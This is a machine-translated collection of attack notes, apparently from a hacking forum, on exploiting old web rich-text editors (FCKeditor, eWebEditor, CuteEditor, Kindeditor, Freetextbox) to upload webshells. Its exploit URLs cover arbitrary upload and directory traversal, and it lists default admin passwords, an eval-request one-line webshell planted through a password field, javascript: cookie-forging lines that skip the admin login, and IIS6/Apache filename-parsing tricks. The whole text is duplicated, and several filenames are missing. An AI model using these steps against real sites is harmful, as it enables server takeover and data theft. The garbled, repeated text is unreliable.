FCKeditor
FCKeditor editor page/View editor version/View file upload path
FCKeditor Editor Page
FCKeditor/_samples/
View editor version
FCKeditor/_whatsnew.html
View file upload path
fckeditor/editor/filemanager/browser/default/connectors/asp/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
The second line of the XML page "url=/xxx" is the default base upload path
Note:[Hell1] As of February 15, 2010, the latest version is FCKeditor v2.6.6
[Hell2] Remember to modify two of the asp script languages that FCKeditor actually uses
Lack of filtering caused by FCKeditor passive restriction strategy
Affected version: FCKeditor <= FCKeditor v2.4.3
Fragile description:
FCKeditor v2.4.3, the file category refuses upload type by default: html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 allows uploading files with asa, cer, php2, php4, inc, pwml, and pht suffixes
After uploading, the file it saves directly uses $sFilePath = $sServerDir. $sFileName, without using $sExtension as the suffix
It directly leads to adding one after uploading the file under win. To break through [not tested]
Under apache, it can also be exploited because of the "Apache file name resolution defect vulnerability". See "Appendix A" for details.
It is also recommended that when defining TYPE variables in other upload vulnerabilities, the file category is used to upload files. According to the code of FCKeditor, its limitations are the most narrow.
Attack exploitation:
Allow any other suffix upload
Utilize the 2003 path resolution vulnerability to upload to the Netma
Impact version: Appendix B
Fragile description:
Using the principle of the 2003 system path resolution vulnerability, create a directory similar to "" and upload a file in this directory and then be executed by the script interpreter with the corresponding script permissions.
Attack exploitation:
fckeditor/editor/filemanager/browser/default/?Type=Image&Connector=connectors/asp/
FCKeditor PHP upload arbitrary file vulnerability
Affected version: FCKeditor 2.2 <= FCKeditor 2.4.2
Fragile description:
FCKeditor has input verification errors when processing file uploads. Remote attacks can use this vulnerability to upload any file.
When uploading files through editor/filemanager/upload/php/, the attacker can cause an arbitrary script to be uploaded by defining invalid values for the Type parameter.
Successful attack requires file upload to enable in the configuration file, which is disabled by default. Attack exploitation: (Please modify the action field to the specified URL):
FCKeditor 《=2.4.2 for
Note: If you want to try the v2.2 version vulnerability, just modify Type=any value, but note that if you change back to Media, you must have the capital letter M. Otherwise, under LINUX, FCKeditor will check the file name of the file directory and will not upload successfully.
TYPE custom variable arbitrary upload file vulnerability
Affected version: Earlier version
Fragile description:
By customizing the parameters of Type variables, you can create or upload files to the specified directory, and there is no limit on uploading file format.
Attack exploitation: /FCKeditor/editor/filemanager/browser/default/?Type=all&Connector=connectors/asp/
Open this address and you can upload any type of file. The default location for uploading the shell is:
/UserFiles/all/
The variable "Type=all" is customized. The directory all is created here, and the new directory has no restrictions on uploading file format.
For example, input:
/FCKeditor/editor/filemanager/browser/default/?Type=../&Connector=connectors/asp/
You can upload it to the root directory of the website.
Note: If the default upload folder cannot be found, you can check this file: fckeditor/editor/filemanager/browser/default/connectors/asp/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor News Component Traversal Directory Vulnerability
Affect version: aspx version FCKeditor, the rest of the versions have not been tested
Fragile description: How to obtain webshell, please refer to the above "TYPE custom variable arbitrary upload file vulnerability"
Attack exploitation:
Modify the CurrentFolder parameter to use ../../ to enter different directories
/browser/default/connectors/aspx/?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=
According to the returned XML information, you can view all directories of the website.
/browser/default/connectors/aspx/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
Other upload methods of webshell in FCKeditor
Impact version: Non-optimized/lite version of FCKeditor
Fragile description:
If the following file exists, you can upload the file after opening it.
Attack exploitation:
fckeditor/editor/filemanager/upload/
fckeditor/editor/filemanager/browser/default/connectors/
FCKeditor file upload "." to "_" bypass method
Affected version: FCKeditor => 2.
Fragile description:
The file we uploaded for example: or;.jpg will become shell_php;.jpg This is a change in the new version of FCK.
Attack exploitation:
Submit + spaces to go around everything,
※But spaces only support win system *nix is not supported [and + spaces are 2 different files]
Note:upload/2010/3/ This format is filtered. That is, IIS6 resolution vulnerability.
Upload for the first time. Filtered to 123_asp; thus unable to run.
But the file with the same name is uploaded for the second time; Since "123_asp;" already exists.
The file name is named;123(1).jpg…;123(2).jpg.
so. The IIS6 vulnerability continues to be implemented.
If the test through the above steps fails, there may be the following reasons:
The file upload function is not enabled, and this function is turned off by default when installing FCKeditor. If you want to upload a file, FCKeditor will give an error message.
2. The website adopts a streamlined version of FCKeditor. Many functions of the streamlined version of FCKeditor are lost, including file upload function.
This vulnerability has been fixed.
--------------------------------------------------------------------------------
eWebEditor
eWebEditor Utilization Basics
Default background address: /ewewebeditor/admin_login.asp
It is recommended to check whether the admin_style.asp file can be accessed directly.
Default database path: [PATH]/db/
[PATH]/db/ -- This database is in some CMS
You can also try [PATH]/db/% -- Some administrators are clever tricks
Use the default password: admin/admin888 or admin/admin to enter the background, and you can also try admin/123456 (this is how some administrators and some CMS are set)
Click "Style Management" - you can choose to add a new style, or modify a non-system style, and add |asp, |asa, |aaspsp or |cer to the upload type allowed by the image control. As long as it is the script type allowed by the server, click "Submit" and set the toolbar - add the "Insert Picture" control. Then -- preview this style, click Insert the picture, upload WEBSHELL, and view the path to upload the file in "Code" mode.
2. When the database is modified by the administrator to asp and asa suffixes, you can insert a sentence to the * server and enter the database, and then connect the * client to get the webshell.
3. Can't execute after uploading? The directory does not have permission? Shuaiguo Go back to style management and see the style you edited. You can customize the upload path in it!!!
4. After setting the upload type, it still cannot be uploaded? It is estimated that the file code has been changed. You can try to set the "remote type" according to version 6.0 to use SHELL (see below for details). You can set the type of remote files that automatically save.
5. You cannot add a toolbar, but you have set the file type in a certain style. What should you do? ↓This way!
(Please modify the action field)
eWebEditor step-invasion
Fragile description:
When we cannot query the plaintext of the password MD5 after downloading the database, we can check the style sheet of webeditor_style(14) to see if any of our predecessors have invaded it. Perhaps a certain control has been given the ability to upload scripts and construct the address to upload our own WEBSHELL.
Attack exploitation:
For example ID=46 s-name = standard1
Construct Code: ?id=content&style=standard
After the ID and style name are changed
?id=46&style=standard1
eWebEditor traversal directory vulnerability
Fragile description:
ewebeditor/admin_uploadfile.asp
admin/
Lack of filtering, causing directory traversal vulnerabilities
Attack exploitation:
The first type: ewewebeditor/admin_uploadfile.asp?id=14
Add &dir=.. after id=14
Add &dir=../..
&dir=/../.. I saw the entire website file
The second type: ewewebeditor/admin/?id=16&d_viewmode=&dir =./..
eWebEditor 5.2 column directory vulnerability
Fragile description:
ewebeditor/asp/
Lack of filtering, causing directory traversal vulnerabilities
Attack exploitation:
https:///ewebeditor/asp/?style=standard650&dir=…././/..
Use WebEditor session spoofing vulnerabilities to enter the background
Fragile description:
Vulnerability file: Admin_Private.asp
Only the session was judged, but no verification issues of cookies and paths were judged.
Attack exploitation:
Create a new content as follows:
Access, and then access any file in the background, for example:Admin_Default.asp
eWebEditor asp version 2.1.6 upload vulnerability
Attack utilization: (Please modify the action field to the specified URL)
ewebeditor asp version 2.1.6 upload exploit.html
eWebEditor 2.7.0 Injection Vulnerability
Attack exploitation:
https:///ewebeditor/?id=article_content&style=full_v200
Default table name: eWebEditor_System Default column names: sys_UserName, sys_UserPass, and then use nbsi to guess.
eWebEditor2.8.0 final version deletes any file vulnerability
Fragile description:
This vulnerability exists in the file under the Example\NewsSystem directory. This is the test page of ewewebeditor. You can enter directly without logging in.
Attack utilization: (Please modify the action field to the specified URL)
Del
eWebEditor v6.0.0 upload vulnerability
Attack exploitation:
Click "Insert Picture" in the editor - Network - enter the address of your WEBSHELL in a certain space (Note: the file name must be: and so on). After confirming, click the "Remote File Automatic Upload" control (the first upload will prompt you to install the control, wait a moment), check the "Code" mode to find the file upload path, and access it. The official DEMO of eweb can also do this, but the execution permission is cancelled for the upload directory, so it is impossible to execute the Netma.
eWebEditor PHP/ASP…backend kill vulnerability
Affected version: PHP ≥ 3.0~3.8 and asp 2.8 are also common, and perhaps the lower version is also OK, and it is still to be tested.
Attack exploitation:
Enter the background /eWebEditor/admin/ and enter any user and password at will, and an error will be prompted.
At this time, you clear the url of your browser and enter
javascript:alert(="adminuser="+escape("admin"));
javascript:alert(="adminpass="+escape("admin"));
javascript:alert(="admindj="+escape("1"));
Then enter three times, clear the browser URL, and now enter some files that cannot be accessed normally, such as.../ewewebeditor/admin/, and you will go in directly.
eWebEditor for php arbitrary file upload vulnerability
Affect version:ewewebeditor php v3.8 or older version
Fragile description:
This version saves all style configuration information as an array $aStyle. When register_global is configured to on, we can add any style we like and define the upload type.
Attack exploitation:
eWebEditor JSP version vulnerability
It's similar. I don't want to say much in this document, because there is no environmental test, and the online garbage dump is so big that it is difficult to check. I think eweb will have much less share than FCKeditor using JSP editor.
eWebEditor 2.8 Business Version Insert a * Horse
Impact version:=>2.8 Commercial version
Attack exploitation:
Log in to the background and click to modify password---The new password is set to 1":eval request("h")'
After the setup is successful, just access the asp/file, and a * is written into this file in one sentence.
eWebEditorNet Upload Vulnerability (WebEditorNet)
Fragile description:
WebEditorNet mainly has an upload vulnerability in a file.
Attack exploitation:
Default upload address: /ewewebeditornet/
You can upload a cer * directly
If you cannot upload, enter javascript:() in the browser address bar;
After successful, check the source code and find the uploadsave to view the upload and save address. By default, it will be uploaded to the uploadfile folder.
southidceditor (usually using v2.8.0 version of eWeb core)
idceditor/datas/">/admin/southidceditor/datas/
http://www.safe5com/admin/southidceditor/admin/admin_login.asp
https:///admin/southidceditor/
bigcneditor(eWeb 2.7.5 VIP core)
In fact, the so-called Bigcneditor is the VIP user version of eWebEditor 2.7.5. The reason why it cannot access admin_login.asp is prompted with the 4-word mantra "not enough permissions" is probably because of its authorization "Licensed" problem, and perhaps only authorized machines are allowed to access the background.
Perhaps the above small actions for the lower versions of eWebEditor v2.8 can be used here. It seems that there are not many actions?
--------------------------------------------------------------------------------
Cute Editor
Cute Editor Online Editor locally contains vulnerabilities
Affect version:
CuteEditor For Net 6.4
Fragile description:
You can view the content of the website file at will, which is very harmful.
Attack exploitation:
https:///CuteSoft_Client/CuteEditor/?type=image&file=../../../
--------------------------------------------------------------------------------
Webhtmleditor
Obtaining SHELL with WIN 2003 IIS file name resolution vulnerability
Affected version: <= Webhtmleditor final version 1.7 (updated stopped)
Fragile description/attack exploitation:
There is no renaming operation for uploaded pictures or other files, resulting in malicious users being allowed to upload; .jpg to bypass the restrictions on suffix name review. For such mistakes made by the editor's author's awareness, even if you encounter thumbnails and file header detection, you can use the picture * to insert a sentence to break through.
--------------------------------------------------------------------------------
Kindeditor
Obtaining SHELL with WIN 2003 IIS file name resolution vulnerability
Impact version: <= kindeditor 3.2.1 (the latest version released in August 2009)
Fragile description/attack exploitation:
Let’s give an official demonstration: Enter upload/2010/3/ You can go and watch.
Note: See Appendix C for principle analysis.
--------------------------------------------------------------------------------
Freetextbox
Freetextbox traversal directory vulnerability
Impact version: Unknown
Fragile description:
Because only / but no filtering \ symbols in the code leads to the problem of traversing the directory.
Attack exploitation:
Clicking on the picture on the editor page will pop up a box (catch the packet and get this address) as follows, you can traverse the directory.
https:///Member/images/ftb/HelperScripts/?frame=1&rif=..&cif=\..
--------------------------------------------------------------------------------
Appendix A:
Apache file name resolution defect vulnerability:
Test environment: apache 2.0.53 winxp, apache 2.0.52 redhat linux
1. Foreign (SSR TEAM) has issued multiple advisory issues saying that Apache's MIME module (mod_mime) related vulnerabilities are vulnerabilities that will be used as php file execution, including the Discuz! vulnerability.
2. S4T's superhei released a small feature of this apache on the blog, that is, apache starts checking the suffix from the later and executes it according to the last legal suffix. In fact, just look at the default installation files of apache htdocs.
It has been said very clearly. You can make full use of the upload vulnerability. I tested it according to the file format that is generally allowed to upload, and listed it as follows (Don't blame the random classification)
Typical type: rar
Backup type: bak, lock
Streaming media type: wma, wmv, asx, as,mp4, rmvb
Microsoft type: sql, chm, hlp, shtml, asp
Any type: test, fake, ph4nt0m
Special type: torrent
Program type: jsp,c,cpp,pl,cgi
4. The key to the entire vulnerability is what "legal suffix" are. Anyone who is not "legal suffix" can be exploited.
5. Test environment
Then add any suffix to test,...
By cloie, in (c) Security.
Appendix B:
The server with iis6 installed (windows2003) is installed, and the affected filename suffix is .asp .asa .cdx .cer .pl .php .cgi
Windows 2003 Enterprise Edition is Microsoft's current mainstream server operating system. Windows 2003 IIS6 has a vulnerability in file resolution path. When the folder name is similar (that is, the folder name looks like the file name of an ASP file), any type of file under this folder (such as .gif, .jpg, .txt, etc.) can be executed in IIS as an ASP program. In this way, the hacker can upload a * file with an extension jpg or gif that looks like an image file, and you can run the * by accessing this file. If any folder in these websites has the name ending with .asp .php .cer .asa .cgi .pl, etc., then any type of file placed under these folders may be considered a script file and handed over to the script parser for execution.
Appendix C:
Vulnerability description:
When the file name is [YYY].asp;[ZZZ].jpg, Microsoft IIS will automatically parse it in asp format.
When the file name is [YYY].php;[ZZZ].jpg, Microsoft IIS will automatically parse it in php format.
Where [YYY] and [ZZZ] are variable strings.
Influence platform:
Windows Server 2000 / 2003 / 2003 R2 (IIS / 6.0)
Repair method:
1. Wait for Microsoft-related patch packages
2. Close the script execution permissions in the directory where the picture is located (provided that some of your pictures are not mixed with the program)
3. Verify all uploaded pictures in the website program and intercept pictures with the shapes of [YYY].asp; [ZZZ].jpg
Remark:
For Windows Server 2008 (IIS7) and Windows Server 2008 R2 (IIS7.5) they are not affected.
FCKeditor editor page/View editor version/View file upload path
FCKeditor Editor Page
FCKeditor/_samples/
View editor version
FCKeditor/_whatsnew.html
View file upload path
fckeditor/editor/filemanager/browser/default/connectors/asp/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
The second line of the XML page "url=/xxx" is the default base upload path
Note:[Hell1] As of February 15, 2010, the latest version is FCKeditor v2.6.6
[Hell2] Remember to modify two of the asp script languages that FCKeditor actually uses
Lack of filtering caused by FCKeditor passive restriction strategy
Affected version: FCKeditor <= FCKeditor v2.4.3
Fragile description:
FCKeditor v2.4.3, the file category refuses upload type by default: html|htm|php|php2|php3|php4|php5|phtml|pwml|inc|asp|aspx|ascx|jsp|cfm|cfc|
pl|bat|exe|com|dll|vbs|js|reg|cgi|htaccess|asis|sh|shtml|shtm|phtm
Fckeditor 2.0 <= 2.2 allows uploading files with asa, cer, php2, php4, inc, pwml, and pht suffixes
After uploading, the file it saves directly uses $sFilePath = $sServerDir. $sFileName, without using $sExtension as the suffix
It directly leads to adding one after uploading the file under win. To break through [not tested]
Under apache, it can also be exploited because of the "Apache file name resolution defect vulnerability". See "Appendix A" for details.
It is also recommended that when defining TYPE variables in other upload vulnerabilities, the file category is used to upload files. According to the code of FCKeditor, its limitations are the most narrow.
Attack exploitation:
Allow any other suffix upload
Utilize the 2003 path resolution vulnerability to upload to the Netma
Impact version: Appendix B
Fragile description:
Using the principle of the 2003 system path resolution vulnerability, create a directory similar to "" and upload a file in this directory and then be executed by the script interpreter with the corresponding script permissions.
Attack exploitation:
fckeditor/editor/filemanager/browser/default/?Type=Image&Connector=connectors/asp/
FCKeditor PHP upload arbitrary file vulnerability
Affected version: FCKeditor 2.2 <= FCKeditor 2.4.2
Fragile description:
FCKeditor has input verification errors when processing file uploads. Remote attacks can use this vulnerability to upload any file.
When uploading files through editor/filemanager/upload/php/, the attacker can cause an arbitrary script to be uploaded by defining invalid values for the Type parameter.
Successful attack requires file upload to enable in the configuration file, which is disabled by default. Attack exploitation: (Please modify the action field to the specified URL):
FCKeditor 《=2.4.2 for
Note: If you want to try the v2.2 version vulnerability, just modify Type=any value, but note that if you change back to Media, you must have the capital letter M. Otherwise, under LINUX, FCKeditor will check the file name of the file directory and will not upload successfully.
TYPE custom variable arbitrary upload file vulnerability
Affected version: Earlier version
Fragile description:
By customizing the parameters of Type variables, you can create or upload files to the specified directory, and there is no limit on uploading file format.
Attack exploitation: /FCKeditor/editor/filemanager/browser/default/?Type=all&Connector=connectors/asp/
Open this address and you can upload any type of file. The default location for uploading the shell is:
/UserFiles/all/
The variable "Type=all" is customized. The directory all is created here, and the new directory has no restrictions on uploading file format.
For example, input:
/FCKeditor/editor/filemanager/browser/default/?Type=../&Connector=connectors/asp/
You can upload it to the root directory of the website.
Note: If the default upload folder cannot be found, you can check this file: fckeditor/editor/filemanager/browser/default/connectors/asp/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/
FCKeditor News Component Traversal Directory Vulnerability
Affect version: aspx version FCKeditor, the rest of the versions have not been tested
Fragile description: How to obtain webshell, please refer to the above "TYPE custom variable arbitrary upload file vulnerability"
Attack exploitation:
Modify the CurrentFolder parameter to use ../../ to enter different directories
/browser/default/connectors/aspx/?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=
According to the returned XML information, you can view all directories of the website.
/browser/default/connectors/aspx/?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
Other upload methods of webshell in FCKeditor
Impact version: Non-optimized/lite version of FCKeditor
Fragile description:
If the following file exists, you can upload the file after opening it.
Attack exploitation:
fckeditor/editor/filemanager/upload/
fckeditor/editor/filemanager/browser/default/connectors/
FCKeditor file upload "." to "_" bypass method
Affected version: FCKeditor => 2.
Fragile description:
The file we uploaded for example: or;.jpg will become shell_php;.jpg This is a change in the new version of FCK.
Attack exploitation:
Submit + spaces to go around everything,
※But spaces only support win system *nix is not supported [and + spaces are 2 different files]
Note:upload/2010/3/ This format is filtered. That is, IIS6 resolution vulnerability.
Upload for the first time. Filtered to 123_asp; thus unable to run.
But the file with the same name is uploaded for the second time; Since "123_asp;" already exists.
The file name is named;123(1).jpg…;123(2).jpg.
so. The IIS6 vulnerability continues to be implemented.
If the test through the above steps fails, there may be the following reasons:
The file upload function is not enabled, and this function is turned off by default when installing FCKeditor. If you want to upload a file, FCKeditor will give an error message.
2. The website adopts a streamlined version of FCKeditor. Many functions of the streamlined version of FCKeditor are lost, including file upload function.
This vulnerability has been fixed.
--------------------------------------------------------------------------------
eWebEditor
eWebEditor Utilization Basics
Default background address: /ewewebeditor/admin_login.asp
It is recommended to check whether the admin_style.asp file can be accessed directly.
Default database path: [PATH]/db/
[PATH]/db/ -- This database is in some CMS
You can also try [PATH]/db/% -- Some administrators are clever tricks
Use the default password: admin/admin888 or admin/admin to enter the background, and you can also try admin/123456 (this is how some administrators and some CMS are set)
Click "Style Management" - you can choose to add a new style, or modify a non-system style, and add |asp, |asa, |aaspsp or |cer to the upload type allowed by the image control. As long as it is the script type allowed by the server, click "Submit" and set the toolbar - add the "Insert Picture" control. Then -- preview this style, click Insert the picture, upload WEBSHELL, and view the path to upload the file in "Code" mode.
2. When the database is modified by the administrator to asp and asa suffixes, you can insert a sentence to the * server and enter the database, and then connect the * client to get the webshell.
3. Can't execute after uploading? The directory does not have permission? Shuaiguo Go back to style management and see the style you edited. You can customize the upload path in it!!!
4. After setting the upload type, it still cannot be uploaded? It is estimated that the file code has been changed. You can try to set the "remote type" according to version 6.0 to use SHELL (see below for details). You can set the type of remote files that automatically save.
5. You cannot add a toolbar, but you have set the file type in a certain style. What should you do? ↓This way!
(Please modify the action field)
eWebEditor step-invasion
Fragile description:
When we cannot query the plaintext of the password MD5 after downloading the database, we can check the style sheet of webeditor_style(14) to see if any of our predecessors have invaded it. Perhaps a certain control has been given the ability to upload scripts and construct the address to upload our own WEBSHELL.
Attack exploitation:
For example ID=46 s-name = standard1
Construct Code: ?id=content&style=standard
After the ID and style name are changed
?id=46&style=standard1
eWebEditor traversal directory vulnerability
Fragile description:
ewebeditor/admin_uploadfile.asp
admin/
Lack of filtering, causing directory traversal vulnerabilities
Attack exploitation:
The first type: ewewebeditor/admin_uploadfile.asp?id=14
Add &dir=.. after id=14
Add &dir=../..
&dir=/../.. I saw the entire website file
The second type: ewewebeditor/admin/?id=16&d_viewmode=&dir =./..
eWebEditor 5.2 column directory vulnerability
Fragile description:
ewebeditor/asp/
Lack of filtering, causing directory traversal vulnerabilities
Attack exploitation:
https:///ewebeditor/asp/?style=standard650&dir=…././/..
Use WebEditor session spoofing vulnerabilities to enter the background
Fragile description:
Vulnerability file: Admin_Private.asp
Only the session was judged, but no verification issues of cookies and paths were judged.
Attack exploitation:
Create a new content as follows:
Access, and then access any file in the background, for example:Admin_Default.asp
eWebEditor asp version 2.1.6 upload vulnerability
Attack utilization: (Please modify the action field to the specified URL)
ewebeditor asp version 2.1.6 upload exploit.html
eWebEditor 2.7.0 Injection Vulnerability
Attack exploitation:
https:///ewebeditor/?id=article_content&style=full_v200
Default table name: eWebEditor_System Default column names: sys_UserName, sys_UserPass, and then use nbsi to guess.
eWebEditor2.8.0 final version deletes any file vulnerability
Fragile description:
This vulnerability exists in the file under the Example\NewsSystem directory. This is the test page of ewewebeditor. You can enter directly without logging in.
Attack utilization: (Please modify the action field to the specified URL)
Del
eWebEditor v6.0.0 upload vulnerability
Attack exploitation:
Click "Insert Picture" in the editor - Network - enter the address of your WEBSHELL in a certain space (Note: the file name must be: and so on). After confirming, click the "Remote File Automatic Upload" control (the first upload will prompt you to install the control, wait a moment), check the "Code" mode to find the file upload path, and access it. The official DEMO of eweb can also do this, but the execution permission is cancelled for the upload directory, so it is impossible to execute the Netma.
eWebEditor PHP/ASP…backend kill vulnerability
Affected version: PHP ≥ 3.0~3.8 and asp 2.8 are also common, and perhaps the lower version is also OK, and it is still to be tested.
Attack exploitation:
Enter the background /eWebEditor/admin/ and enter any user and password at will, and an error will be prompted.
At this time, you clear the url of your browser and enter
javascript:alert(="adminuser="+escape("admin"));
javascript:alert(="adminpass="+escape("admin"));
javascript:alert(="admindj="+escape("1"));
Then enter three times, clear the browser URL, and now enter some files that cannot be accessed normally, such as.../ewewebeditor/admin/, and you will go in directly.
eWebEditor for php arbitrary file upload vulnerability
Affect version:ewewebeditor php v3.8 or older version
Fragile description:
This version saves all style configuration information as an array $aStyle. When register_global is configured to on, we can add any style we like and define the upload type.
Attack exploitation:
eWebEditor JSP version vulnerability
It's similar. I don't want to say much in this document, because there is no environmental test, and the online garbage dump is so big that it is difficult to check. I think eweb will have much less share than FCKeditor using JSP editor.
eWebEditor 2.8 Business Version Insert a * Horse
Impact version:=>2.8 Commercial version
Attack exploitation:
Log in to the background and click to modify password---The new password is set to 1":eval request("h")'
After the setup is successful, just access the asp/file, and a * is written into this file in one sentence.
eWebEditorNet Upload Vulnerability (WebEditorNet)
Fragile description:
WebEditorNet mainly has an upload vulnerability in a file.
Attack exploitation:
Default upload address: /ewewebeditornet/
You can upload a cer * directly
If you cannot upload, enter javascript:() in the browser address bar;
After successful, check the source code and find the uploadsave to view the upload and save address. By default, it will be uploaded to the uploadfile folder.
southidceditor (usually using v2.8.0 version of eWeb core)
idceditor/datas/">/admin/southidceditor/datas/
http://www.safe5com/admin/southidceditor/admin/admin_login.asp
https:///admin/southidceditor/
bigcneditor(eWeb 2.7.5 VIP core)
In fact, the so-called Bigcneditor is the VIP user version of eWebEditor 2.7.5. The reason why it cannot access admin_login.asp is prompted with the 4-word mantra "not enough permissions" is probably because of its authorization "Licensed" problem, and perhaps only authorized machines are allowed to access the background.
Perhaps the above small actions for the lower versions of eWebEditor v2.8 can be used here. It seems that there are not many actions?
--------------------------------------------------------------------------------
Cute Editor
Cute Editor Online Editor locally contains vulnerabilities
Affect version:
CuteEditor For Net 6.4
Fragile description:
You can view the content of the website file at will, which is very harmful.
Attack exploitation:
https:///CuteSoft_Client/CuteEditor/?type=image&file=../../../
--------------------------------------------------------------------------------
Webhtmleditor
Obtaining SHELL with WIN 2003 IIS file name resolution vulnerability
Affected version: <= Webhtmleditor final version 1.7 (updated stopped)
Fragile description/attack exploitation:
There is no renaming operation for uploaded pictures or other files, resulting in malicious users being allowed to upload; .jpg to bypass the restrictions on suffix name review. For such mistakes made by the editor's author's awareness, even if you encounter thumbnails and file header detection, you can use the picture * to insert a sentence to break through.
--------------------------------------------------------------------------------
Kindeditor
Obtaining SHELL with WIN 2003 IIS file name resolution vulnerability
Impact version: <= kindeditor 3.2.1 (the latest version released in August 2009)
Fragile description/attack exploitation:
Let’s give an official demonstration: Enter upload/2010/3/ You can go and watch.
Note: See Appendix C for principle analysis.
--------------------------------------------------------------------------------
Freetextbox
Freetextbox traversal directory vulnerability
Impact version: Unknown
Fragile description:
Because only / but no filtering \ symbols in the code leads to the problem of traversing the directory.
Attack exploitation:
Clicking on the picture on the editor page will pop up a box (catch the packet and get this address) as follows, you can traverse the directory.
https:///Member/images/ftb/HelperScripts/?frame=1&rif=..&cif=\..
--------------------------------------------------------------------------------
Appendix A:
Apache file name resolution defect vulnerability:
Test environment: apache 2.0.53 winxp, apache 2.0.52 redhat linux
1. Foreign (SSR TEAM) has issued multiple advisory issues saying that Apache's MIME module (mod_mime) related vulnerabilities are vulnerabilities that will be used as php file execution, including the Discuz! vulnerability.
2. S4T's superhei released a small feature of this apache on the blog, that is, apache starts checking the suffix from the later and executes it according to the last legal suffix. In fact, just look at the default installation files of apache htdocs.
It has been said very clearly. You can make full use of the upload vulnerability. I tested it according to the file format that is generally allowed to upload, and listed it as follows (Don't blame the random classification)
Typical type: rar
Backup type: bak, lock
Streaming media type: wma, wmv, asx, as,mp4, rmvb
Microsoft type: sql, chm, hlp, shtml, asp
Any type: test, fake, ph4nt0m
Special type: torrent
Program type: jsp,c,cpp,pl,cgi
4. The key to the entire vulnerability is what "legal suffix" are. Anyone who is not "legal suffix" can be exploited.
5. Test environment
Then add any suffix to test,...
By cloie, in (c) Security.
Appendix B:
The server with iis6 installed (windows2003) is installed, and the affected filename suffix is .asp .asa .cdx .cer .pl .php .cgi
Windows 2003 Enterprise Edition is Microsoft's current mainstream server operating system. Windows 2003 IIS6 has a vulnerability in file resolution path. When the folder name is similar (that is, the folder name looks like the file name of an ASP file), any type of file under this folder (such as .gif, .jpg, .txt, etc.) can be executed in IIS as an ASP program. In this way, the hacker can upload a * file with an extension jpg or gif that looks like an image file, and you can run the * by accessing this file. If any folder in these websites has the name ending with .asp .php .cer .asa .cgi .pl, etc., then any type of file placed under these folders may be considered a script file and handed over to the script parser for execution.
Appendix C:
Vulnerability description:
When the file name is [YYY].asp;[ZZZ].jpg, Microsoft IIS will automatically parse it in asp format.
When the file name is [YYY].php;[ZZZ].jpg, Microsoft IIS will automatically parse it in php format.
Where [YYY] and [ZZZ] are variable strings.
Influence platform:
Windows Server 2000 / 2003 / 2003 R2 (IIS / 6.0)
Repair method:
1. Wait for Microsoft-related patch packages
2. Close the script execution permissions in the directory where the picture is located (provided that some of your pictures are not mixed with the program)
3. Verify all uploaded pictures in the website program and intercept pictures with the shapes of [YYY].asp; [ZZZ].jpg
Remark:
For Windows Server 2008 (IIS7) and Windows Server 2008 R2 (IIS7.5) they are not affected.